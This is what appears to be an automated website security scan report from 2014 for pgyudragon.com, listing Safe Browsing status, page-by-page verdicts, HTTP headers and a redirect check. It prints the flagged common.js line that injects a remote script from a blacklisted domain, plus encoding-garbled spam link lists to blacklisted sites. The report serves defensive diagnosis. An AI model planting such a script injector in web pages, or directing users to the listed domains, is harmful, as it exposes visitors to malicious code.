Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pgyudragon.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://pgyudragon.com/ | HTTP/1.1 200 OK Date: Sat, 20 Sep 2014 10:09:40 GMT Accept-Ranges: bytes ETag: "5c1abb482bd4cf1:baba" Server: Microsoft-IIS/6.0 Content-Length: 19379 Content-Location: http://pgyudragon.com/index.html Content-Type: text/html Last-Modified: Fri, 19 Sep 2014 17:00:58 GMT X-Powered-By: ASP.NET | clean |
http://pgyudragon.com/index.html | 200 OK Content-Length: 19379 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: qidc.net ...[2698 bytes skipped]... ÈçÑ©»¬Äå¿ÉϧÕÔÈý´ººÃ¾Ã°×»¢ÉÙÅ®ÒõÂдÕæ´óÍÈ">ÈçÑ©»¬Äå¿ÉϧÕÔÈý´ººÃ¾Ã°×»¢ÉÙÅ®ÒõÂдÕæ´óÍÈ</a></li> <li><a href="http://pgyudragon.com/yzhdbtp/4520140903.html" title="ÊÇ°¡³¬¼¶¼µ¶Ê¼ÓÄôóÔÆÏö·É³µÅ¶Òª×ö">ÊÇ°¡³¬¼¶¼µ¶Ê¼ÓÄôóÔÆÏö·É³µÅ¶Òª×ö</a></li> </ul> </div> <div class="block"> <h3>ÓÑÇéÁ¬½Ó</h3> <ul> <li class="no1"><a href="http://qidc.net" title="ţţÊÖ»ú°æÏÖ½ðÓÎÏ·">ţţÊÖ»ú°æÏÖ½ðÓÎÏ·</a></li> <li class="no1"><a href="http://156581636.org" title="ºÝµÃߣÉÙÅ®">ºÝµÃߣÉÙÅ®</a></li> <li class="no1"><a href="http://tiqing.com.cn" title="ʲôÍøÖ·ÓÐaƬ">ʲôÍøÖ·ÓÐaƬ</a></li> <li class="no1"><a href="http://2tgj56f.com" title="ÑÇÖÞͼƬɫÖиó">ÑÇÖÞͼƬɫÖиó</a></li> <li class="no1"><a href="http://gsb10f.com" tit ...[1449 bytes skipped]... | ||
http://pgyudragon.com/common.js | 200 OK Content-Length: 96 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: js.lwtzdec.com document.writeln("<SCRIPT language=javascript src=\"http://js.lwtzdec.com/zy.js\"></SCRIPT>");
Decoded script: <SCRIPT language=javascript src="http://js.lwtzdec.com/zy.js"></SCRIPT> | ||
http://pgyudragon.com/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://pgyudragon.com/dssbzxdy/ | HTTP/1.1 200 OK Date: Sat, 20 Sep 2014 10:09:44 GMT Accept-Ranges: bytes ETag: "484eab472bd4cf1:baba" Server: Microsoft-IIS/6.0 Content-Length: 17676 Content-Location: http://pgyudragon.com/dssbzxdy/index.html Content-Type: text/html Last-Modified: Fri, 19 Sep 2014 17:00:56 GMT X-Powered-By: ASP.NET | clean |
http://pgyudragon.com/dssbzxdy/index.html | 200 OK Content-Length: 17676 Content-Type: text/html | clean |
http://pgyudragon.com/yzhdbtp/ | HTTP/1.1 200 OK Date: Sat, 20 Sep 2014 10:09:45 GMT Accept-Ranges: bytes ETag: "8e11cf472bd4cf1:baba" Server: Microsoft-IIS/6.0 Content-Length: 17664 Content-Location: http://pgyudragon.com/yzhdbtp/index.html Content-Type: text/html Last-Modified: Fri, 19 Sep 2014 17:00:57 GMT X-Powered-By: ASP.NET | clean |
http://pgyudragon.com/yzhdbtp/index.html | 200 OK Content-Length: 17664 Content-Type: text/html | clean |
http://pgyudragon.com/rtysnx/ | HTTP/1.1 200 OK Date: Sat, 20 Sep 2014 10:09:47 GMT Accept-Ranges: bytes ETag: "d4d4f2472bd4cf1:baba" Server: Microsoft-IIS/6.0 Content-Length: 17769 Content-Location: http://pgyudragon.com/rtysnx/index.html Content-Type: text/html Last-Modified: Fri, 19 Sep 2014 17:00:57 GMT X-Powered-By: ASP.NET | clean |
http://pgyudragon.com/rtysnx/index.html | 200 OK Content-Length: 17769 Content-Type: text/html | clean |
http://pgyudragon.com/rtysnx/91320140920.html | 200 OK Content-Length: 11734 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: acgskys.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" lang="zh-CN" > <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>ÐßÐß´ð´ð²»µÈÈýÈË·¢ìÄĸöÈí¼þ¿ÉÒÔÖ±²¥¹úÍâ³ÉÈ˵çÊǪ́¹´¶¯ÀîåÐÒ£¸Õ¸ÕÒÑÈ»ÐÜÐÜȼÉÕ_www.mgm01.com_ÈÕ±¾Å®Óſ첥дÕ桾Ïà¹Ø×ÊѶ¡¿< ...[4546 bytes skipped]... | ||
http://pgyudragon.com/yzhdbtp/29020140909.html | 200 OK Content-Length: 12444 Content-Type: text/html | clean |
http://pgyudragon.com/dssbzxdy/61820140909.html | 200 OK Content-Length: 10340 Content-Type: text/html | clean |
http://pgyudragon.com/yzhdbtp/9320140903.html | 200 OK Content-Length: 10458 Content-Type: text/html | clean |
http://pgyudragon.com/dssbzxdy/5520140903.html | 200 OK Content-Length: 10252 Content-Type: text/html | clean |
http://pgyudragon.com/dssbzxdy/65220140828.html | 200 OK Content-Length: 10775 Content-Type: text/html | clean |
http://pgyudragon.com/yzhdbtp/0020140824.html | 200 OK Content-Length: 10168 Content-Type: text/html | clean |
http://pgyudragon.com/rtysnx/77420140824.html | 200 OK Content-Length: 10763 Content-Type: text/html | clean |
http://pgyudragon.com/yzhdbtp/31920140823.html | 200 OK Content-Length: 10356 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pgyudragon.com
Result:
HTTP/1.1 200 OK
Date: Sat, 20 Sep 2014 10:09:40 GMT
Accept-Ranges: bytes
ETag: "5c1abb482bd4cf1:baba"
Server: Microsoft-IIS/6.0
Content-Length: 19379
Content-Location: http://pgyudragon.com/index.html
Content-Type: text/html
Last-Modified: Fri, 19 Sep 2014 17:00:58 GMT
X-Powered-By: ASP.NET
...19379 bytes of data.
GET / HTTP/1.1
Host: pgyudragon.com
Result:
HTTP/1.1 200 OK
Date: Sat, 20 Sep 2014 10:09:40 GMT
Accept-Ranges: bytes
ETag: "5c1abb482bd4cf1:baba"
Server: Microsoft-IIS/6.0
Content-Length: 19379
Content-Location: http://pgyudragon.com/index.html
Content-Type: text/html
Last-Modified: Fri, 19 Sep 2014 17:00:58 GMT
X-Powered-By: ASP.NET
...19379 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pgyudragon.com
Referer: http://www.google.com/search?q=pgyudragon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pgyudragon.com
Referer: http://www.google.com/search?q=pgyudragon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.